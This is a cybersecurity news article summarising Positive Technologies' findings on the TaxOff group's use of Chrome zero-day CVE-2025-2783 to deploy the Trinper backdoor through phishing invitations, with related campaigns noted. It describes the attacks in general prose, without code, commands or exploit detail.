TaxOff APT Exploits Google Chrome Zero-Day (CVE-2025-2783) to Deploy Stealthy Trinper Backdoor
Do Son 
In March 2025, cybersecurity experts at Positive Technologies uncovered a series of targeted attacks against Russian organizations, exploiting a previously unknown vulnerability in Google Chrome. Behind the operation stood the threat actor group known as TaxOff, which leveraged the CVE-2025-2783 exploit to deploy a powerful backdoor named Trinper. Although the vulnerability has since been patched, the incident underscored the grave risks posed by zero-day exploitation chains.
The infection chain began with a phishing email disguised as an invitation to the “Primakov Readings” forum. A single click on the embedded link triggered the exploit, culminating in the silent installation of the Trinper trojan. A similar tactic had been observed in October 2024, when malicious payloads were distributed through fake invitations to a Union State security conference.
Written in C++, Trinper employs multithreading to simultaneously collect system information, log keystrokes, and exfiltrate documents in formats such as .doc, .xls, .ppt, .rtf, and .pdf. The backdoor establishes persistent communication with a remote command-and-control (C2) server, from which it receives instructions ranging from shell command execution and reverse shell deployment to directory manipulation and self-deletion. Thanks to its concurrent design, Trinper maintains continuous data exchange, supports modular extension, and executes complex attack routines—all while remaining concealed.
The malware was deployed using tools such as Donut and Cobalt Strike. In one instance, the infection vector was a ZIP archive containing a Windows shortcut that launched a PowerShell script. This script downloaded a decoy document and initiated Trinper’s installation.
According to Positive Technologies, behavioral analysis of the attack chain revealed notable similarities to campaigns attributed to another group—Team46. In fact, one month prior to the March incident, similar phishing emails were detected purporting to originate from Rostelecom, falsely announcing technical maintenance and containing ZIP files with PowerShell-launching shortcuts to deploy the same backdoor.
Another episode, detailed in September 2024 by Doctor Web, described an attack on a logistics company involving the exploitation of the CVE-2024-6473 zero-day flaw in Yandex Browser. The attack utilized DLL hijacking to replace legitimate system libraries and execute arbitrary code. The vulnerability was only addressed with the release of version 24.7.1.380 later that same month.
Experts conclude that TaxOff possesses a robust capability for executing sophisticated, long-term, and targeted cyber-espionage campaigns. Its use of zero-day exploits and bespoke malware highlights the group’s strategic intent to maintain persistent access within victim infrastructure. The group’s attack vectors, phishing lures, and malware delivery mechanisms all reflect a high degree of operational maturity and focus, with targets spanning from government entities to industrial enterprises.
Donate